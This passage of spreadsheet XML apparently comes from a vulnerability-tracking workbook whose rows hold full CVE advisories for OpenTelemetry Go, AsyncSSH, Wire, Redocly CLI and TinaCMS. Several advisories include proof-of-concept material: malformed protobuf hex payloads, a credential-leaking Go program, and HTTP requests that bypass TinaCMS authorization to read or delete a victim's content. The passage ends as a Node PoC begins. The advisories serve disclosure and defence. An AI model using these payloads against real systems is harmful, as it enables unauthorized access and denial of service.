      <c r="M1082" s="5" t="inlineStr">
        <is>
          <t>1.45.0</t>
        </is>
      </c>
      <c r="N1082" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1082" s="5" t="inlineStr"/>
      <c r="P1082" s="5" t="inlineStr"/>
      <c r="Q1082" s="5" t="inlineStr"/>
      <c r="R1082" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-532</t>
        </is>
      </c>
      <c r="S1082" s="5" t="inlineStr">
        <is>
          <t>### Summary
OpenTelemetry Go versions 1.5.0 through 1.44.0 can include trace exporter endpoint configuration in an internal diagnostic log emitted when an SDK `TracerProvider` is created. The default OpenTelemetry logger does not emit this event. Exposure requires an application to install a logger that enables OpenTelemetry's internal Info-level diagnostics and for someone other than the intended audience to have access to those logs.
The logged configuration can disclose the address of the trace collector and whether the OTLP/HTTP connection is configured as insecure. The Zipkin exporter logs its complete collector URL, so credentials in URL userinfo or tokens in the query string are also disclosed if an application embeds them there. OTLP authentication headers, TLS key material, and exported span data are not included in this log.
Exporter `MarshalLog` implementations that caused this configuration to be included in internal logs were introduced by [`a1fff3c`](https://github.com/open-telemetry/opentelemetry-go/commit/a1fff3c2588c783d1f3f6fd2315aa2660fc6d330).
### Details
When `sdk/trace.NewTracerProvider` constructs a provider, it records a `TracerProvider created` internal Info event containing the provider configuration. In affected versions, the configuration's `MarshalLog` methods recursively include:
1. the provider's span processors;
2. each processor's span exporter; and
3. for the OTLP trace exporter, its client configuration.
This causes the following values to be present in the event:
- OTLP trace gRPC: the configured endpoint;
- OTLP trace HTTP: the configured endpoint and the `Insecure` flag; and
- Zipkin: the complete collector URL.
OpenTelemetry Go does not emit this event with its default logger, which only emits errors. An application must explicitly configure a sufficiently verbose logger with `otel.SetLogger`. The required `logr` verbosity is version-dependent:
- versions 1.5.0 through 1.14.x use `V(1)` for this Info event; and
- versions 1.15.0 through 1.44.0 use `V(4)`.
OTLP header configuration is not part of the marshaled object, so credentials supplied with `WithHeaders` or the corresponding environment variables are not exposed. The documented OTLP `WithEndpoint` input is a collector address rather than a credential-bearing URL. The higher-risk case is therefore the Zipkin collector URL, which is retained and logged in full, or an application passing sensitive data in an OTLP endpoint outside the documented format.
### Proof of concept
The following program demonstrates the behavior with OpenTelemetry Go 1.44.0. It deliberately places credentials and a token in the Zipkin collector URL and enables internal Info logging:
```go
package main
import (
	"bytes"
	"context"
	"fmt"
	"github.com/go-logr/logr/funcr"
	"go.opentelemetry.io/otel"
	"go.opentelemetry.io/otel/exporters/zipkin"
	sdktrace "go.opentelemetry.io/otel/sdk/trace"
)
func main() {
	var logs bytes.Buffer
	otel.SetLogger(funcr.New(func(_, args string) {
		_, _ = logs.WriteString(args)
	}, funcr.Options{Verbosity: 4}))
	exporter, err := zipkin.New(
		"http://user:pass@zipkin.internal:9411/api/v2/spans?token=secret",
	)
	if err != nil {
		panic(err)
	}
	tp := sdktrace.NewTracerProvider(sdktrace.WithBatcher(exporter))
	_ = tp.Shutdown(context.Background())
	fmt.Println(logs.String())
}
```
The `TracerProvider created` event contains:
```text
http://user:pass@zipkin.internal:9411/api/v2/spans?token=secret
```
For versions before 1.15.0, set `funcr.Options{Verbosity: 1}` instead.
### Impact
This is a conditional disclosure through application logs. Affected applications must enable verbose OpenTelemetry internal diagnostics and configure a trace exporter containing information they do not intend to expose to readers of those logs. In that configuration, a person or system with log access can learn the trace collector address and internal network topology. If credentials or tokens are embedded directly in a Zipkin collector URL, those values can also be recovered from the logs.
There is no exposure with the default OpenTelemetry logger, and the vulnerable log is generated from local application configuration rather than remotely supplied span data. OTLP authentication headers, certificate or private-key contents, and telemetry payloads are not logged by this path.
### Remediation
Upgrade the affected OpenTelemetry Go modules to version 1.45.0 or later. The fix in [`3a1412d`](https://github.com/open-telemetry/opentelemetry-go/commit/3a1412d2b3bc4e4231fbeac2ed42117ae541bb38) stops recursively marshaling exporter and client configuration and records their types instead.
If an immediate upgrade is not possible:
- keep OpenTelemetry internal logging below the Info verbosity described above;
- do not embed credentials or tokens in exporter endpoint URLs; use authentication headers or another supported credential mechanism; and
- restrict access to existing logs and rotate any credentials that may already have been recorded.</t>
        </is>
      </c>
      <c r="T1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81870</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1083" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62949</t>
        </is>
      </c>
      <c r="D1083" s="5" t="inlineStr"/>
      <c r="E1083" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1083" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1083" s="5" t="inlineStr"/>
      <c r="H1083" s="5" t="inlineStr"/>
      <c r="I1083" s="5" t="inlineStr"/>
      <c r="J1083" s="5" t="inlineStr"/>
      <c r="K1083" s="5" t="inlineStr"/>
      <c r="L1083" s="5" t="inlineStr">
        <is>
          <t>pip:asyncssh</t>
        </is>
      </c>
      <c r="M1083" s="5" t="inlineStr">
        <is>
          <t>2.24.0</t>
        </is>
      </c>
      <c r="N1083" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1083" s="5" t="inlineStr"/>
      <c r="P1083" s="5" t="inlineStr"/>
      <c r="Q1083" s="5" t="inlineStr"/>
      <c r="R1083" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S1083" s="5" t="inlineStr">
        <is>
          <t>## Summary
A malicious SSH server can wedge an AsyncSSH **client**, and an authenticated
client can wedge an AsyncSSH **server**, by sending a channel `maximum packet
size` of `0` in `SSH_MSG_CHANNEL_OPEN_CONFIRMATION` (server→client) or
`SSH_MSG_CHANNEL_OPEN` (client→server). AsyncSSH stores the peer-supplied value
verbatim with no lower-bound check; the first time channel data is written,
`SSHChannel._flush_send_buf` enters a **synchronous infinite loop** that cannot
be interrupted by `asyncio.wait_for` or any timeout. The loop body has no
`await`, so it blocks the entire asyncio event loop — for a server, one
malicious authenticated channel freezes **all** current and future connections.
RFC 4254 §5.1 leaves receiver behavior for a peer-reported "maximum packet
size = 0" undefined, so the value must be rejected rather than stored.
## Root cause
`asyncssh/channel.py`:
```python
# process_open (server side)        -- line 465
self._send_pktsize = send_pktsize    # peer value, no &gt;= 1 check
# process_open_confirmation (client) -- line 528
self._send_pktsize = send_pktsize    # peer value, no &gt;= 1 check
# _flush_send_buf                    -- lines 305-320
while self._send_buf and self._send_window:
    pktsize = min(self._send_window, self._send_pktsize)  # 0 when peer sends 0
    buf, datatype = self._send_buf[0]
    if len(buf) &gt; pktsize:          # True for any buffered data
        data = buf[:pktsize]        # empty (b'')
        del buf[:pktsize]           # no-op
    ...
    self._send_window -= len(data)  # -= 0, unchanged
```
With `_send_pktsize == 0`, `pktsize` is `0`, so `buf[:0]` is empty,
`del buf[:0]` is a no-op, and `_send_window` is never decremented — the
`while` condition is permanently true, and with no `await` in the body the
event loop is blocked.
## Impact
- **Client vector (primary):** a malicious SSH server replies to the client's
  channel open with `maximum packet size = 0`; the client wedges on its first
  channel write. The attacker is the server, so it needs no valid credentials.
- **Server vector:** an authenticated client opens a channel with
  `maximum packet size = 0`; any server-side channel write wedges the AsyncSSH
  server's event loop, freezing **every** current and future connection. A
  single low-privilege account can take the whole server down.
Both vectors are a single SSH message, deterministic, and cause total
availability loss for the affected process.
## Affected versions
&lt;= 2.23.1 (latest release, 2026-06-06); also present on `master`
(channel.py:465/528 unguarded). Verified end-to-end on 2.23.1.
## Verification
The maintainer's proposed fix (reject `send_pktsize == 0` in `connection.py`
`_process_channel_open` / `_process_channel_open_confirmation`) was applied to
2.23.1 and re-tested end-to-end over TCP:
- **Unpatched:** malicious server (paramiko forcing `max_packet_size=0` in
  OPEN_CONFIRMATION) + real asyncssh client → client event loop wedges.
- **Patched:** the guard fires inside `_process_channel_open_confirmation`, the
  malicious value is rejected, the connection closes cleanly
  (`ChannelOpenError: SSH connection closed`), and the client does **not** wedge.
The maintainer (Ron Frederick) independently confirmed the freeze and noted that
**even shutting the server down does not break clients out of the loop**.
Reproducers available: a focused harness driving the real
`SSHChannel._flush_send_buf` with `_send_pktsize=0`, and an end-to-end
`malicious_server.py` (paramiko) + `client.py` (real asyncssh) pair. The
end-to-end client repro uses `asyncio.new_event_loop()` (not `get_event_loop()`)
for Python 3.14 compatibility.
## Suggested fix (maintainer's approach)
In `connection.py`, after each `send_pktsize = packet.get_uint32()` in
`_process_channel_open` and `_process_channel_open_confirmation`:
```python
if send_pktsize == 0:
    raise ProtocolError('Invalid maximum packet size')
```
## CVSS
`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H` (6.5 Medium). An earlier draft
quoted 7.5 High ("100% CPU"); the synchronous loop burns ~100% of one core's
worth of CPU but, being single-threaded, the OS scheduler spreads it across
cores, so the real impact is event-loop / connection freeze, not machine-wide
CPU exhaustion.
## References
- RFC 4254 §5.1 (channel "maximum packet size"; behavior for 0 is undefined).
- The same `maximum packet size = 0` send-loop wedge was confirmed in several
  other independent SSH implementations (different languages/runtimes) and
  reported to each maintainer separately.
## Credits
Reported by zhangph (afldl), 2026-06-20.
```</t>
        </is>
      </c>
      <c r="T1083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62949</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1084" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63126</t>
        </is>
      </c>
      <c r="D1084" s="5" t="inlineStr"/>
      <c r="E1084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1084" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1084" s="5" t="inlineStr"/>
      <c r="H1084" s="5" t="inlineStr"/>
      <c r="I1084" s="5" t="inlineStr"/>
      <c r="J1084" s="5" t="inlineStr"/>
      <c r="K1084" s="5" t="inlineStr"/>
      <c r="L1084" s="5" t="inlineStr">
        <is>
          <t>maven:com.squareup.wire:wire-runtime</t>
        </is>
      </c>
      <c r="M1084" s="5" t="inlineStr">
        <is>
          <t>6.4.5, 7.0.0-alpha04</t>
        </is>
      </c>
      <c r="N1084" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1084" s="5" t="inlineStr"/>
      <c r="P1084" s="5" t="inlineStr"/>
      <c r="Q1084" s="5" t="inlineStr"/>
      <c r="R1084" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S1084" s="5" t="inlineStr">
        <is>
          <t>Wire's protobuf decoders did not consistently validate attacker-controlled length-delimited sizes against the current reader bounds before computing cursor, limit, or pointer positions.
In the Kotlin runtime, `ProtoAdapter.decode(ByteArray)` and `ProtoAdapter.decode(ByteString)` use the `ProtoReader32` fast path implemented by `ByteArrayProtoReader32`. In `ByteArrayProtoReader32.internalNextLengthDelimited()`, Wire read an untrusted varint length into an `Int` and rejected only negative values. A length such as `2147483647` is non-negative, so it passed that check, but `pos + length` overflowed the signed 32-bit cursor and produced a negative `limit`. The following `if (limit &gt; pushedLimit)` guard did not catch this because the overflowed value was negative.
That invalid limit then reached string, bytes, skip, and scalar-reading paths as an invalid byte count or invalid range. Instead of failing as a checked decode error such as `IOException`, malformed input could throw unchecked runtime exceptions including `IllegalArgumentException` and `ArrayIndexOutOfBoundsException`. Applications commonly treat malformed protobuf input as an expected decode failure; unchecked runtime exceptions escaping that boundary can crash request handling or the process.
The original report is a sibling of the negative-length skipped-group bug fixed as CVE-2026-45799. It is not the same bug. The length in this advisory is positive, and the overflow occurs when setting a length-delimited message limit, not only when skipping a group.
While auditing for the same bug class, related boundary flaws were also found and fixed:
- Kotlin `ProtoReader` now validates logical message limits before varint, fixed32, fixed64, and skip operations. The originally reported byte-array overflow payload did not reproduce as the same signed overflow in `ProtoReader`, because that reader tracks positions as `Long`, but the streaming reader still needed consistent current-message-limit enforcement.
- Swift `ReadBuffer.readVarint()` read `pointer.pointee` before checking that one byte remained. A tag-only varint field could read past the end of the buffer.
- Swift `ReadBuffer.verifyAdditional(count:)` formed `pointer.advanced(by: count)` before proving the requested `count` fit within the remaining buffer, so pointer arithmetic ran before the bounds were established. (The distinct Swift negative-length `skipGroup()` crash is tracked separately as GHSA-86wm-r4c5-2rc9 / CVE-2026-61695; this advisory covers the positive/oversized-length boundary failures.)
- Swift nested-message decoding and packed-repeated decoding computed end pointers from untrusted lengths before validating that the bytes were present.
- Swift packed-repeated decoding reserved array capacity from an untrusted length before validating that the length existed in the current buffer.
- Swift size-delimited decoding converted an untrusted `UInt64` varint size to `Int` without exactness or availability checks. On platforms where the value is not representable, this could trap.
The fix enforces a single invariant across the hardened readers: every decoded or skipped byte count must be non-negative and no larger than the remaining bytes in the current logical message limit before any cursor, pointer, limit, allocation, or slice is advanced.
### Impact
An attacker who can supply protobuf bytes to an application using affected Wire decoders can trigger a denial of service by causing decode to fail with unchecked runtime failures or traps rather than normal malformed-input decode errors.
Known impact:
- Availability impact only.
- No known confidentiality impact.
- No known integrity impact.
- No known code execution.
Attack requirements:
- The application decodes attacker-controlled protobuf bytes with Wire.
- No authentication is required if the decoding endpoint is reachable without authentication.
- A single short malformed protobuf payload is sufficient for the Kotlin byte-array fast path.
Most directly affected Kotlin entry points:
- `ProtoAdapter.decode(ByteArray)`
- `ProtoAdapter.decode(ByteString)`
Adjacent Kotlin path hardened by this fix:
- `ProtoAdapter.decode(BufferedSource)`
- direct use of `ProtoReader`
Affected Swift entry points:
- Swift `ProtoDecoder` and `ProtoReader` APIs when decoding attacker-controlled `Data` or buffers.
### Proof of concept and regression payloads
These payloads are intentionally small and should be treated as malformed protobuf input. After the fix, they must fail with normal decode errors such as `IOException`, `EOFException`, or `ProtoDecoder.Error.unexpectedEndOfData`, not unchecked runtime exceptions, traps, out-of-bounds reads, or large allocations.
#### Kotlin byte-array known length-delimited field
Hex:
```text
0A FF FF FF FF 07
```
Meaning:
- `0A`: field 1, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix behavior observed through `Person.ADAPTER.decode(byteArray)`:
```text
java.lang.IllegalArgumentException: startIndex: 6 &gt; endIndex: -2147483643
```
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin byte-array unknown length-delimited field
Hex:
```text
1A FF FF FF FF 07
```
Meaning:
- `1A`: field 3, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix behavior observed:
```text
ArrayIndexOutOfBoundsException
```
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin byte-array skipped group containing oversized positive length
Hex:
```text
0B 0A FF FF FF FF 07 0C
```
Meaning:
- `0B`: start group, field 1
- `0A`: nested field 1, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
- `0C`: end group, field 1
Expected fixed behavior:
```text
IOException / EOFException
```
#### Kotlin current-message-limit fixed32 boundary
Hex:
```text
02 0D 05 00 00 00
```
Meaning:
- `02`: outer length-delimited message length is 2 bytes
- `0D`: nested field 1, fixed32
- `05 00 00 00`: enough bytes remain in the underlying source, but not inside the current logical message limit
Expected fixed behavior:
```text
EOFException
```
This covers the invariant that scalar reads must not cross the current length-delimited message boundary even when the underlying source has more bytes available.
#### Swift tag-only varint value
Hex:
```text
08
```
Meaning:
- `08`: field 1, varint
- Missing varint value byte
Pre-fix risk:
- `ReadBuffer.readVarint()` could dereference `pointer.pointee` before verifying that a byte remained.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift nested message with oversized positive length
Hex:
```text
12 FF FF FF FF 07
```
Meaning:
- `12`: field 2, length-delimited
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix risk:
- Nested message decoding computed an end pointer from an untrusted length before proving that the buffer contained that many bytes.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift packed repeated field with oversized positive length
Hex:
```text
0A FF FF FF FF 07
```
Meaning:
- `0A`: field 1, length-delimited packed repeated field
- `FF FF FF FF 07`: varint length `2147483647`
Pre-fix risk:
- Packed repeated decoding could reserve capacity based on an untrusted length before proving the bytes were present.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
#### Swift size-delimited stream with unrepresentable size
Hex:
```text
FF FF FF FF FF FF FF FF FF 01
```
Meaning:
- Size-delimited message length varint `UInt64.max`
Pre-fix risk:
- `ProtoDecoder.decodeSizeDelimited(_:from:)` converted the untrusted `UInt64` to `Int` without exactness checking.
Expected fixed behavior:
```text
ProtoDecoder.Error.unexpectedEndOfData
```
### Root cause
The vulnerable code mixed three operations that must remain separate:
1. Decode an untrusted protobuf length.
2. Validate that the length is non-negative and fits within the current logical message boundary.
3. Advance the cursor, pointer, limit, slice, or allocation based on that length.
In the vulnerable paths, step 3 happened before step 2 was complete. For Kotlin `ByteArrayProtoReader32`, this caused signed integer wraparound in `pos + length`. For Swift, related pointer and allocation operations could be performed before proving the requested bytes existed.
### Fix
The fix centralizes checked cursor and pointer advancement.
Kotlin changes:
- `ByteArrayProtoReader32` now validates constructor invariants for `pos` and `limit`.
- `ByteArrayProtoReader32` now uses shared helpers to:
  - reject negative lengths,
  - compute checked limits,
  - compute remaining bytes in the current logical limit,
  - validate before `skip`,
  - validate before string and bytes reads,
  - validate before fixed32 and fixed64 reads.
- `ProtoReader` now mirrors the same logical-boundary model for:
  - length-delimited limit calculation,
  - skipped length-delimited fields,
  - varint reads,
  - fixed32 reads,
  - fixed64 reads,
  - current-message remaining-byte calculations.
Swift changes:
- `ReadBuffer` now computes checked end pointers only after confirming `count &gt;= 0` and `count &lt;= remaining`.
- `ReadBuffer.readVarint()` verifies one byte remains before each byte dereference.
- `ReadBuffer.readBuffer(count:)`, `readData(count:)`, `readFixed32()`, and `readFixed64()` compute the checked new pointer before reading and advancing.
- `ProtoReader.beginMessage()` validates nested message lengths before storing a message-end pointer.
- Packed repeated decoding validates the packed field length before preallocation and before constructing the loop boundary.
- `ProtoDecoder.decodeSizeDelimited(_:from:)` converts sizes with `Int(exactly:)` and verifies that the full message bytes exist before constructing a child buffer.
Fixed in PR #3635:
- https://github.com/square/wire/pull/3635
- Fix commit `25ebcabb9ab7f12d1d77af75ecbc51726fddc015`
### Workarounds
The recommended remediation is to upgrade to a patched release.
Partial mitigations if an immediate upgrade is not possible:
- Reject or cap untrusted protobuf message sizes before passing bytes to Wire.
- Prefer decoding from a bounded source where possible rather than decoding unbounded attacker-controlled byte arrays.
- Treat unchecked runtime exceptions from protobuf decode as malformed-input failures at service trust boundaries so they cannot crash the process.
- For Swift, do not pass untrusted size-delimited streams or `Data` directly to affected decoders without an outer size cap and exception/error boundary.
These mitigations reduce exposure but do not fully fix the parser bugs.
### Detection
A crash or error may contain one of the following symptoms when processing malformed protobuf bytes:
```text
IllegalArgumentException: startIndex: 6 &gt; endIndex: -2147483643
ArrayIndexOutOfBoundsException
IndexOutOfBoundsException
unexpected unchecked RuntimeException during ProtoAdapter.decode(ByteArray)
Swift trap during Int conversion from an untrusted protobuf size
Swift unexpected pointer/buffer failure while reading malformed varints or length-delimited values
```
The absence of these exact messages does not prove safety. Any unchecked exception, trap, or process crash while decoding malformed length-delimited protobuf input should be investigated.
### Verification
Regression tests added:
- `ProtoReader32Test.lengthDelimitedRejectsPositiveLengthOverflow`
- `ProtoReader32Test.fixed32CannotReadPastLengthDelimitedLimit`
- `ProtoReaderTest.fixed32CannotReadPastLengthDelimitedLimit`
- `ProtoReaderTests.testReadVarintRejectsMissingValue`
- `ProtoReaderTests.testNestedMessageRejectsOversizedLength`
- `ProtoReaderTests.testPackedRepeatedRejectsOversizedLengthBeforePreallocation`
- `ProtoDecoderTests.testDecodeSizeDelimitedRejectsUnrepresentableSize`
Focused verification command:
```bash
./gradlew :wire-runtime:jvmTest :wire-runtime-swift:test
```
Expected result:
```text
BUILD SUCCESSFUL
```
### Relationship to related advisories
This is a distinct vulnerability from the negative-length issues. It is a
different bug class — a positive, non-negative length (for example
`2147483647`) that passes the existing `length &lt; 0` check but still overflows
the signed 32-bit cursor or crosses the current message boundary — and it has
a separate fix (PR #3635, not the negative-length PRs).
- `CVE-2026-45799` / `GHSA-7xpr-hc2w-34m9` fixed the original Kotlin/JVM
  negative-length skipped-group crash (Wire `6.3.0`). The non-negative
  overflow described here was not covered by that check and remained
  exploitable through `6.4.4`.
- `GHSA-86wm-r4c5-2rc9` / `CVE-2026-61695` covers the Swift negative-length
  `skipGroup()` crash (PR #3616). The Swift hardening in this advisory
  (PR #3635) instead addresses positive/oversized-length overflow, buffer
  over-read, and unrepresentable-size conversions in the Swift readers.</t>
        </is>
      </c>
      <c r="T1084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63126</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1085" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63225</t>
        </is>
      </c>
      <c r="D1085" s="5" t="inlineStr"/>
      <c r="E1085" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1085" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1085" s="5" t="inlineStr"/>
      <c r="H1085" s="5" t="inlineStr"/>
      <c r="I1085" s="5" t="inlineStr"/>
      <c r="J1085" s="5" t="inlineStr"/>
      <c r="K1085" s="5" t="inlineStr"/>
      <c r="L1085" s="5" t="inlineStr">
        <is>
          <t>npm:@redocly/cli</t>
        </is>
      </c>
      <c r="M1085" s="5" t="inlineStr">
        <is>
          <t>1.34.17, 2.33.2</t>
        </is>
      </c>
      <c r="N1085" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1085" s="5" t="inlineStr"/>
      <c r="P1085" s="5" t="inlineStr"/>
      <c r="Q1085" s="5" t="inlineStr"/>
      <c r="R1085" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="S1085" s="5" t="inlineStr">
        <is>
          <t>### Impact
An OpenAPI or AsyncAPI description could make the `split` command write
files outside the chosen output directory, on the machine of anyone who runs
`split` against it. The write is constrained rather than a free file-write
primitive: component data is emitted only as YAML/JSON, and code-sample files are
named after the HTTP method, so an attacker can place or overwrite files at an
unintended path but has limited control over their name and contents.
### Patches
Fixed in `@redocly/cli` v2.33.2.
### Workarounds
Do not run the `split` command on API descriptions from untrusted or unreviewed sources.
To detect an exploit attempt, inspect the description's component names and
`x-codeSamples` `lang` values for a literal `../` — neither legitimately contains
path segments.</t>
        </is>
      </c>
      <c r="T1085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63225</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1086" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63506</t>
        </is>
      </c>
      <c r="D1086" s="5" t="inlineStr"/>
      <c r="E1086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1086" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1086" s="5" t="inlineStr"/>
      <c r="H1086" s="5" t="inlineStr"/>
      <c r="I1086" s="5" t="inlineStr"/>
      <c r="J1086" s="5" t="inlineStr"/>
      <c r="K1086" s="5" t="inlineStr"/>
      <c r="L1086" s="5" t="inlineStr">
        <is>
          <t>npm:@tinacms/auth, npm:next-tinacms-azure</t>
        </is>
      </c>
      <c r="M1086" s="5" t="inlineStr">
        <is>
          <t>1.1.4, 15.0.1</t>
        </is>
      </c>
      <c r="N1086" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1086" s="5" t="inlineStr"/>
      <c r="P1086" s="5" t="inlineStr"/>
      <c r="Q1086" s="5" t="inlineStr"/>
      <c r="R1086" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S1086" s="5" t="inlineStr">
        <is>
          <t>## Summary
`@tinacms/auth`'s `isAuthorized(req)` decides authorization by validating the caller's bearer token against `https://identity.tinajs.io/v2/apps/${req.query.clientID}/currentUser`, where the `clientID` comes from the request and is never compared to the site's own configured TinaCloud app id. The function answers "is this token a verified user of whatever app the caller named?" instead of "is this token a verified user of THIS site?"
Any TinaCloud user can create their own free app, get a valid token for it, and send `?clientID=&lt;their-own-app&gt;` plus `Authorization: &lt;their-own-token&gt;` to a victim self-hosted site. The victim's `authorized` callback runs `const user = await isAuthorized(req); return user &amp;&amp; user.verified`, which returns `true`, and the victim authorizes the attacker.
The attacker holds no account on the victim and needs no victim interaction. With the media handlers this grants read, upload, and delete on the victim's media bucket. When the backend uses `TinaCloudBackendAuthProvider()` (the default the `tinacms init` wizard generates for TinaCloud auth), it grants full GraphQL read, write, and delete of the victim's content.
## Affected code (confirmed at `5a6839f`)
`packages/@tinacms/auth/src/index.ts:71-88` reads the `clientID` from the request:
```ts
export const isAuthorized = async (req: NextApiRequest) =&gt; {
  const clientID = req.query.clientID;     // attacker-controlled
  const token = req.headers.authorization; // attacker-controlled
  if (typeof clientID === 'string' &amp;&amp; typeof token === 'string') {
    return await isUserAuthorized({ clientID, token });
  }
  return undefined;
};
```
`index.ts:16-43` sends that caller-chosen `clientID` straight to the identity server, and returns the user on `200`:
```ts
const tinaCloudRes = await fetch(
  `https://identity.tinajs.io/v2/apps/${clientID}/currentUser`,
  { headers: new Headers({ 'Content-Type': 'application/json', authorization: token }), method: 'GET' }
);
if (tinaCloudRes.ok) { return await tinaCloudRes.json(); }
```
`index.ts:118-135` (`TinaCloudBackendAuthProvider`) gates only on `verified`, which reflects the attacker's own email verification:
```ts
isAuthorized: async (req, _res) =&gt; {
  const user = await isAuthorized(req as NextApiRequest);
  if (user &amp;&amp; user.verified) return { isAuthorized: true };
  return { isAuthorized: false, errorCode: 401, errorMessage: 'Unauthorized' };
},
```
Every media-store README wires the same gate (`next-tinacms-cloudinary/README.md:113-122`, identical in `s3` and `dos`):
```ts
authorized: async (req, _res) =&gt; {
  if (process.env.NEXT_PUBLIC_USE_LOCAL_CLIENT === '1') return true;
  const user = await isAuthorized(req);
  return user &amp;&amp; user.verified;   // no clientID === &lt;this site's app&gt; check
}
```
The bug is duplicated in `next-tinacms-azure/src/auth.ts:34-51` (`req.nextUrl.searchParams.get('clientID')`). Downstream nothing pins the site's `clientID`: `@tinacms/datalayer/src/backend/index.ts:201` gates on the boolean, and `next-tinacms-cloudinary/src/handlers.ts:36` returns 401 only when the callback is false. The `tinacms init` TinaCloud path ships this by default (`@tinacms/cli/.../prompts/authProvider.ts:17` -&gt; `TinaCloudBackendAuthProvider()`, used in `templates/tinaNextRoute.tsx:21-24` for every non-local deployment).
## Steps to reproduce (real target)
**Setup:** attacker has one free TinaCloud account with one app (`clientID = ATTACKER_APP`, token `T_attacker`) and no victim account. Victim is any self-hosted TinaCMS site using `@tinacms/auth`.
Media bucket (read; the same gate covers `POST` upload and `DELETE`):
```
GET /api/cloudinary/media?clientID=ATTACKER_APP HTTP/1.1
Host: victim.example
Authorization: T_attacker
```
Content backend, when `TinaCloudBackendAuthProvider` is used:
```
POST /api/tina/gql?clientID=ATTACKER_APP HTTP/1.1
Host: victim.example
Authorization: T_attacker
Content-Type: application/json
{"query":"mutation($c:String!,$r:String!){deleteDocument(collection:$c,relativePath:$r){__typename}}","variables":{"c":"post","r":"hello.md"}}
```
**Expected:** 401/403 for a user with no access to `victim.example`.
**Actual:** 200, because authorization is bound to the attacker-supplied `clientID`.
## Proof of concept (self-contained, zero dependencies)
Save the file below as `poc.js` and run `node poc.js` (Node &gt;= 18). It runs the package's own `isAuthorized` / `isUserAuthorized` (TypeScript types removed; the hard-coded `identity.tinajs.io` base read from an env var so it points at a local identity model) behind the verbatim media-store `authorized` callback. The identity model scopes tokens to apps correctly and is not itself vulnerable; the bug is that the victim lets the caller choose which app to validate against.
```js
/**
 * Self-contained PoC — @tinacms/auth cross-tenant authorization bypass
 * Audited commit: 5a6839f95ca60d1b9f4032a3bed1ae4a338a4787 (@tinacms/auth 1.1.3)
 *
 * Zero dependencies. Run with:  node poc.js   (Node &gt;= 18 for global fetch)
 *
 * The two functions below are copied from packages/@tinacms/auth/src/index.ts.
 * The ONLY changes are: TypeScript types removed, and the hard-coded
 * https://identity.tinajs.io base read from IDENTITY_BASE so it can point at the
 * local identity model. req.query.clientID, the currentUser call, and the
 * `user &amp;&amp; user.verified` gate are byte-for-byte the original logic.
 */
const http = require('http');
const IDENTITY_PORT = 18099;
const VICTIM_PORT = 19090;
process.env.IDENTITY_BASE = `http://127.0.0.1:${IDENTITY_PORT}`;
